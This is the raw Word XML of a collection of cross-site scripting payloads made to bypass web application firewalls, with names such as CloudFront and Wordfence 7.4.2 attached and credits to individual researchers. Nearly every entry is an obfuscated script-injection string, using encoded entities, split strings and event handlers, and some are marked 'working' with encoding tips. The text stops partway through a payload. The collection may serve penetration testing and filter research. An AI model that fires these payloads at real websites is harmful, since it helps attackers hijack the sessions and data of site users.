    <w:p w14:paraId="58693E66" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="01CF69D3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>"&gt;%0D%0A%0D%0A&lt;x '="foo"&gt;&lt;x foo='&gt;&lt;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=x onerror=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(`cloudfrontbypass`)//'&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5568D6C1" w14:textId="57375BF3" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"&gt;'&gt;&lt;details/open/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ontoggle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=confirm('XSS')&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32038933" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="4CB33BB9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>6'%22</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>()%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%25%22%3E%3Csvg/onload=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt(1)%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>3E/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13070C04" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1064A6D6" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>quot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lt;img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=x </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>confirm(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>);&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006107C2" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="257350CE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;x/onclick=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>globalThis&amp;lsqb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;'\u0070r\u006f'+'mpt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>']&amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>lt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>;)&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>clickme</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">   (</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>working)-Pinaki @0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xInfection(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>Make sure to URL encode the payload properly)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EFB292" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2DA27B0F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tarun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"&gt;&lt;x/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onafterscriptexecute</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=confirm%26lpar;)// -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sratarun</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4D57B721" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="39194E2C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a/href="j%0A%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Davascript:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>var{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3:s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,2:h,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5:a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0:v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4:n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1:e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}='earltv</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'}[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>self][</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v+a+e+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>e+s+v+h+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>n)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/infected</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)" /&gt;click (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>workin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">)Pinaki @0xInfection (Make sure the applications </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>decodes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the payload from encoded)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD8B804" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0718369E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;details/open/ontoggle="self['wind'%2b'ow</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'one'%2b'rror</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>']=</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>self['wind'%2b'ow</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'ale'%2b'rt'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>];throw</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/**/self['doc'%2b'ument</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>'domain'];"&gt; - @xsspayloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3F19D" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1788DFF1" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> onload\r\n=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>$.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>globalEval</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>("al"+"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>");&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7903D419" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="22ECC216" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;bleh/onclick=top[/al</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>+/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ert</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>]&amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Tab;`</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`&gt;click Pinaki @0xInfection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDE9B55" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="49FA07CF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sVg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> OnPointerEnter="location=`javas`+`</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cript:ale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>`+`rt%2`+`81%2`+`9`;//&lt;/div"&gt; -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AldenAous</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="180A7AD3" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="6516B655" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a/href="j%0A%0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Davascript:{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>var{</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>3:s</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,2:h,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>5:a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0:v</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>4:n</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1:e</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>}='test</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'}[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>self][</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>0][</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>v+a+e+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s](</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>e+s+v+h+</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>n)(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/infected</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/.source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)" /&gt;tap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335DD83C" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="323D4B37" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6 -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>naglinagli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="747B5984" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="3B26034E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;meter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)" -@manjith27945363</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C59A5F9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="564104BE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">'"&gt;&gt;&lt;div&gt;&lt;meter </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onmouseover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="alert(1)"&lt;/div&gt;" -@manjith27945363</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175FCB36" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="51039675" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&gt;&gt;&lt;marquee loop=1 width=0 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onfinish</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt; -@manjith27945363</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11AFD70E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="21D9F1AE" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wordfence</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 7.4.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41195F87" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="0572842E" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=&amp;#01</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>javascript:alert</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(1)&gt; -@</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>brutelogic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15458CCA" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="2836DE14" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;a/href=%26%23x6</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>61;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>76;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>61;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>73;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>63;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>72;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>69;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>70;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>74;%</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>26%23x0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>a;:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>alert(1)&gt;please%20click%20here&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF25DAF" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="7C00FA28" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549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srcdoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="&lt;script&gt;prompt(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>document.domain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>)&lt;/script&gt;"&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C89CCD6" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5D8414C4" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;video&gt;&lt;source </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>="prompt(1)"&gt;&lt;/video&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D9A0A" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="1DAB4E9F" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;math&gt;&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>mtext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;/title&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF3ED32" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5BDF8349" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;&lt;desc&gt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>&lt;![</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>CDATA[&lt;/desc&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>/script&gt;]]&gt;&lt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BC657B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5E8DF0FB" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t xml:space="preserve">&lt;details open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ontoggle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>prompt(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662AA19" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="12243D8D" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&lt;input autofocus </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onfocus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135A141B" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="01C20709" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isindex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> type=image </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">=1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9492BB" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549"/>
    <w:p w14:paraId="5DCDB4B9" w14:textId="77777777" w:rsidR="00367549" w:rsidRDefault="00367549" w:rsidP="00367549">
      <w:r>
        <w:t>&lt;object data="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>data:text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>html,&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
